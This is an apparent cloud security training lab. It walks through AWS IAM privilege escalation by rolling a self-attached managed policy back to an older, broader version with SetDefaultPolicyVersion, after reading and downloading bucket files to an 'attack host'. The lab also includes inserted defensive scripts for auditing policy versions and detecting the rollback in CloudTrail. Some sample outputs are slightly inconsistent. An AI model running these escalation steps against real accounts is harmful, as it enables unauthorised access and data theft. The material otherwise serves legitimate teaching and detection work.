Lab 3 - Privilege Escalation
3.1 Learn more about the recently created user access keys
3.1.1 Whoami?
Let's run the GetCallerIdentity API call again, but this time specifying the apollo profile:
Get Caller Identity
aws sts --profile apollo get-caller-identity
Example Results
{
"UserId": "AROA4EHKV54SOATTFJKSC:apollo-config-01",
"Account": "833715826468",
"Arn": "arn:aws:iam::833715826468:user/apollo-config-01"
}
3.1.2 What policy is associated with this user?
First, list the inline policies using the ListUserPolicies API call:
Replace XX with Lab Number
This example call is using a placeholder of XX in the user name. This needs to be replaced with your Lab Number in order for it to work correctly.
List Inline Policies
aws --profile apollo iam list-user-policies --user-name apollo-config-XX
Example Results
{
"PolicyNames": []
}
Looks like there are no inline policies associated with our user, but remember this isn't the only method for granting permissions to a user.
Next we'll list the attached (managed) policies using the ListAttachedUserPolicies API call:
Replace XX with Lab Number
This example call is using a placeholder of XX in the user name. This needs to be replaced with your Lab Number in order for it to work correctly.
List Attached Policies
aws --profile apollo iam list-attached-user-policies --user-name apollo-config-XX
Example Results
{
"AttachedPolicies": [
{
"PolicyName": "ec2-limited-policy-01",
"PolicyArn": "arn:aws:iam::833715826468:policy/apollo-config-policy-XX"
}]
}
Looks like we got a hit! Having the policy ARN and name alone doesn't tell us what permissions we have. Let's move on to the next step to learn what permissions this policy grants us.
3.1.3 What is the default version of this policy?
First, let's pull back metadata about the policy using the GetPolicy API call:
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy ARN. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy
aws --profile apollo iam get-policy --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX
Example Results
{
"Policy": {
"PolicyName": "apollo-config-policy-XX",
"PolicyId": "ANPA4EHKV54SM4L67IA76",
"Arn": "arn:aws:iam::833715826468:policy/apollo-config-policy-01",
"Path": "/",
"DefaultVersionId": "v2",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2024-06-04T04:14:55Z",
"UpdateDate": "2024-06-04T04:14:55Z",
"Tags": []
}
}
Take notice that the DefaultVersionId is v2: this tells us that when we run commands, our permissions are evaluated against v2 of this policy.
3.1.4 What permissions are associated with the current version of the policy?
Next, let's pull back the v2 policy document to learn what permissions we have with this user.
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy ARN. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy Version
aws --profile apollo iam get-policy-version --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX --version-id v2
Example Results
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:SetDefaultPolicyVersion"
],
"Resource": "arn:aws:iam::833715826468:policy/apollo-config-policy-"
},
{
"Effect": "Allow",
"Action": [
"iam:ListUserPolicies",
"iam:ListAttachedUserPolicies"
],
"Resource": "arn:aws:iam:::user/${aws:username}"
},
{
"Effect": "Allow",
"Action": [
"s3:ListAllMyBuckets",
"s3:ListBucket"
],
"Resource": "arn:aws:s3:::checksomebytes-configurations"
},
{
"Effect": "Allow",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::checksomebytes-configurations/*"
}
]
},
"VersionId": "v2",
"IsDefaultVersion": true,
"CreateDate": "2024-06-10T14:54:50Z"
}
}
Summarising the v2 document, this user can call:
- GetPolicy
- GetPolicyVersion
- SetDefaultPolicyVersion
Against the policy apollo-config-policy-XX
- ListUserPolicies
- ListAttachedUserPolicies
Against your own user
- ListAllMyBuckets
- ListBucket
- GetObject
Against the bucket (checksomebytes-configurations)
Note that SetDefaultPolicyVersion is granted against the very policy that is attached to this user, which is what the rest of this lab builds on.
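The manual enumeration above (GetPolicy, then GetPolicyVersion on the default version) answers the question for one version at a time. The following script is an added example, not part of the lab, that does the same analysis offline over policy version documents: it expands each version into (action, resource) grants, reports what a non-default version adds over the default, and checks the condition that makes this lab possible, namely a default version that grants iam:SetDefaultPolicyVersion over its own ARN. The two documents and the policy ARN (with the lab's XX placeholder kept) are constructed copies of the lab output, and the wildcard matcher is a simplification that ignores Deny, NotAction and Condition elements.

```python
"""Offline audit of IAM managed-policy versions (added example, not lab code)."""
import fnmatch
import json

# Constructed: the policy ARN as the lab writes it, with the XX placeholder kept.
POLICY_ARN = "arn:aws:iam::833715826468:policy/apollo-config-policy-XX"

# Constructed copies of the two version documents shown in the lab output.
V2_DOC = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:GetPolicy", "iam:GetPolicyVersion", "iam:SetDefaultPolicyVersion"],
     "Resource": "arn:aws:iam::833715826468:policy/apollo-config-policy-XX"},
    {"Effect": "Allow", "Action": ["iam:ListUserPolicies", "iam:ListAttachedUserPolicies"],
     "Resource": "arn:aws:iam::*:user/${aws:username}"},
    {"Effect": "Allow", "Action": ["s3:ListAllMyBuckets", "s3:ListBucket"],
     "Resource": "arn:aws:s3:::checksomebytes-configurations"},
    {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::checksomebytes-configurations/*"},
]}
V1_DOC = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["ssm:SendCommand", "ec2:DescribeInstances"],
     "Resource": ["arn:aws:ec2:us-east-1:833715826468:instance/i-0b43a0237be29144f",
                  "arn:aws:ssm:us-east-1::document/AWS-RunShellScript"]},
    {"Sid": "Statement1", "Effect": "Allow", "Action": ["ssm:GetCommandInvocation"], "Resource": ["*"]},
    {"Effect": "Allow", "Action": ["iam:ListUserPolicies", "iam:ListAttachedUserPolicies"],
     "Resource": "arn:aws:iam::*:user/${aws:username}"},
    {"Effect": "Allow", "Action": ["s3:ListAllMyBuckets", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::checksomebytes-configurations", "arn:aws:s3:::checksomebytes-project-redstone"]},
    {"Effect": "Allow", "Action": "s3:GetObject",
     "Resource": ["arn:aws:s3:::checksomebytes-configurations/*", "arn:aws:s3:::checksomebytes-project-redstone/*"]},
]}


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    return [value] if isinstance(value, str) else list(value)


def _matches(pattern, value, fold_case=False):
    """IAM-style wildcard match using only * and ?. fnmatch also treats [...] as a
    character class, which IAM does not, so '[' is escaped first."""
    pattern = pattern.replace("[", "[[]")
    if fold_case:  # action names are case-insensitive; ARNs are not
        pattern, value = pattern.lower(), value.lower()
    return fnmatch.fnmatchcase(value, pattern)


def expand_grants(doc):
    """Set of (action, resource) pairs granted by Allow statements.
    Deny, NotAction and Condition are ignored, so this over-approximates access."""
    grants = set()
    for stmt in doc.get("Statement", []):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        for action in _as_list(stmt["Action"]):
            for resource in _as_list(stmt.get("Resource", "*")):
                grants.add((action, resource))
    return grants


def can_self_escalate(policy_arn, doc):
    """True when doc grants iam:SetDefaultPolicyVersion over policy_arn itself."""
    return any(
        _matches(action, "iam:SetDefaultPolicyVersion", fold_case=True)
        and _matches(resource, policy_arn)
        for action, resource in expand_grants(doc)
    )


def gained_over_default(default_doc, candidate_doc):
    """(action, resource) pairs the candidate version grants that the default does not."""
    return sorted(expand_grants(candidate_doc) - expand_grants(default_doc))


def audit_policy(policy_arn, versions, default_id):
    """versions maps version id -> document. Returns one finding per non-default version."""
    default_doc = versions[default_id]
    rollback_possible = can_self_escalate(policy_arn, default_doc)
    return {
        vid: {"extra_grants": gained_over_default(default_doc, doc),
              "rollback_possible": rollback_possible}
        for vid, doc in versions.items()
        if vid != default_id
    }


if __name__ == "__main__":
    print(json.dumps(audit_policy(POLICY_ARN, {"v1": V1_DOC, "v2": V2_DOC}, "v2"), indent=2))
```

Running the script prints the grants v1 adds over v2 (the SSM and EC2 actions and the second bucket) and rollback_possible: true for v1, because v2 itself hands out SetDefaultPolicyVersion on the policy. In a real account the version documents would come from ListPolicyVersions and GetPolicyVersion for every customer-managed policy, and any policy where rollback_possible is true for a version with non-empty extra_grants deserves the same scrutiny as a direct grant of those permissions.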
3.2 What data do we have access to in the checksomebytes-configurations bucket?
3.2.1 List items in checksomebytes-configurations bucket
List objects in bucket
aws --profile apollo s3 ls s3://checksomebytes-configurations
Example Results
2024-05-09 09:41:42 27496 audit.rules
2024-05-09 09:41:43 2656 nginx.conf
2024-05-09 09:41:43 2593 squid.conf
2024-05-09 09:41:42 123257 sysmonconfig-export.xml
3.2.2 Download the squid.conf file from bucket to your attack host
Download Object
aws --profile apollo s3 cp s3://checksomebytes-configurations/squid.conf ./
Example Results
download: s3://checksomebytes-configurations/squid.conf to ./squid.conf
3.2.3 View the stolen file
View File
ls -al
less squid.conf
Example Results
# Auth
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/squid_passwd
acl ncsa_users proxy_auth REQUIRED
http_access allow ncsa_users
acl all src all
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl localnet src 10.0.0.0/8 # RFC1918 possible internal network
acl localnet src 172.16.0.0/12 # RFC1918 possible internal network
acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
acl localnet src fc00::/7 # RFC 4193 local private network range
acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machines
....truncated....
3.3 Privilege Escalation
Changing the "default" version of a managed policy changes the version that is evaluated for authorization for every entity the policy is attached to. We know that the version we are currently using is v2; let's see whether there is another version that we can set as the default to gain more permissions.
3.3.1 Is there a version 1 of this policy?
We're going to use the GetPolicyVersion API call to pull back v1 of the apollo config policy:
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy name. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy Version
aws --profile apollo iam get-policy-version --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX --version-id v1
Example Results
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"ssm:SendCommand",
"ec2:DescribeInstances"
],
"Resource": [
"arn:aws:ec2:us-east-1:833715826468:instance/i-0b43a0237be29144f",
"arn:aws:ssm:us-east-1::document/AWS-RunShellScript"
]
},
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": [
"ssm:GetCommandInvocation"
],
"Resource": [
"*"
]
},
{
"Effect": "Allow",
"Action": [
"iam:ListUserPolicies",
"iam:ListAttachedUserPolicies"
],
"Resource": "arn:aws:iam::*:user/${aws:username}"
},
{
"Effect": "Allow",
"Action": [
"s3:ListAllMyBuckets",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::checksomebytes-configurations",
"arn:aws:s3:::checksomebytes-project-redstone"
]
},
{
"Effect": "Allow",
"Action": "s3:GetObject",
"Resource": [
"arn:aws:s3:::checksomebytes-configurations/*",
"arn:aws:s3:::checksomebytes-project-redstone/*"
]
}
]
}
Good news, there is a previous version (v1) of this policy that we can revert to. Looking at the associated permissions, v1 gives us a few new permissions:
- ListBucket
- GetObject
Against a new bucket (checksomebytes-project-redstone)
- SendCommand (along with DescribeInstances and GetCommandInvocation)
3.3.2 Update the policy version to revert back to v1
By using the SetDefaultPolicyVersion API call, we can change the default version of the policy attached to our apollo user:
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy name. This needs to be replaced with your Lab Number in order for it to work correctly.
Set Default Policy Version
aws --profile apollo iam set-default-policy-version --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX --version-id v1
3.3.3 Verify that the default version of the apollo policy is now v1
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy name. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy
aws --profile apollo iam get-policy --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX
Example Results
{
"Policy": {
"PolicyName": "apollo-config-policy-01",
"PolicyId": "ANPA4EHKV54SKBWSUVGEF",
"Arn": "arn:aws:iam::833715826468:policy/apollo-config-policy-01",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2024-06-04T05:57:01Z",
"UpdateDate": "2024-06-04T06:52:54Z",
"Tags": []
}
}
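From the defender's side, the sequence in this section leaves a recognisable trail in CloudTrail: GetPolicyVersion reads against a policy, followed by a SetDefaultPolicyVersion call that selects a lower version than the caller had just inspected. The script below is an added example, not part of the lab, that implements that detection over a handful of constructed CloudTrail records (only the fields the detector reads are included; event ids, timestamps and the user ARN are made up to mirror the lab). It also carries a CloudWatch Logs metric-filter pattern for the same event, for trails shipped to a log group.

```python
"""Detect managed-policy default-version changes in CloudTrail (added example, not lab code)."""
import re

# CloudWatch Logs metric-filter pattern that alerts on the same event.
METRIC_FILTER_PATTERN = (
    '{ ($.eventSource = "iam.amazonaws.com") && ($.eventName = "SetDefaultPolicyVersion") }'
)

# Constructed: the lab's policy ARN (XX placeholder kept) and user ARN.
POLICY_ARN = "arn:aws:iam::833715826468:policy/apollo-config-policy-XX"
ACTOR = "arn:aws:iam::833715826468:user/apollo-config-01"

# Constructed CloudTrail records mirroring sections 3.3.1 to 3.3.2 of the lab.
SAMPLE_RECORDS = [
    {"eventID": "evt-1", "eventTime": "2024-06-04T06:50:10Z", "eventSource": "iam.amazonaws.com",
     "eventName": "GetPolicyVersion", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}},
    {"eventID": "evt-2", "eventTime": "2024-06-04T06:51:30Z", "eventSource": "iam.amazonaws.com",
     "eventName": "GetPolicyVersion", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v1"}},
    {"eventID": "evt-3", "eventTime": "2024-06-04T06:52:54Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "userIdentity": {"arn": ACTOR}, "requestParameters": None},
    {"eventID": "evt-4", "eventTime": "2024-06-04T06:52:54Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v1"}},
]


def _version_number(version_id):
    """'v3' -> 3; returns None for anything that is not an IAM version id."""
    m = re.fullmatch(r"v(\d+)", version_id or "")
    return int(m.group(1)) if m else None


def detect_default_version_changes(records):
    """Return one finding per SetDefaultPolicyVersion event, in time order.

    A finding is marked as a rollback when the same actor had already read a
    higher-numbered version of the same policy via GetPolicyVersion."""
    findings = []
    highest_seen = {}  # (actor, policyArn) -> highest version number read
    recon_count = {}   # (actor, policyArn) -> number of GetPolicyVersion reads
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue
        params = rec.get("requestParameters") or {}
        key = (rec["userIdentity"]["arn"], params.get("policyArn"))
        ver = _version_number(params.get("versionId"))
        if rec["eventName"] == "GetPolicyVersion" and ver is not None:
            highest_seen[key] = max(highest_seen.get(key, 0), ver)
            recon_count[key] = recon_count.get(key, 0) + 1
        elif rec["eventName"] == "SetDefaultPolicyVersion":
            findings.append({
                "eventID": rec["eventID"],
                "eventTime": rec["eventTime"],
                "actor": key[0],
                "policyArn": key[1],
                "versionId": params.get("versionId"),
                "rollback": ver is not None and highest_seen.get(key, 0) > ver,
                "recon_events": recon_count.get(key, 0),
            })
    return findings


if __name__ == "__main__":
    for finding in detect_default_version_changes(SAMPLE_RECORDS):
        print(finding)
```

SetDefaultPolicyVersion is rare enough in most accounts that every occurrence is worth a ticket; the rollback flag and recon count simply rank the ones that look like this lab. The corresponding preventive control is to keep iam:SetDefaultPolicyVersion (and iam:CreatePolicyVersion) out of any policy attached to the principal whose access that policy defines, and to delete superseded policy versions once they are no longer needed.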
---
Section Recap
- Ran AWS API calls to learn what permissions are associated with the apollo user
- Found the default version of the policy related to the user
- Accessed data in the S3 bucket (checksomebytes-configurations)
- Reverted the policy to a previous version to elevate privileges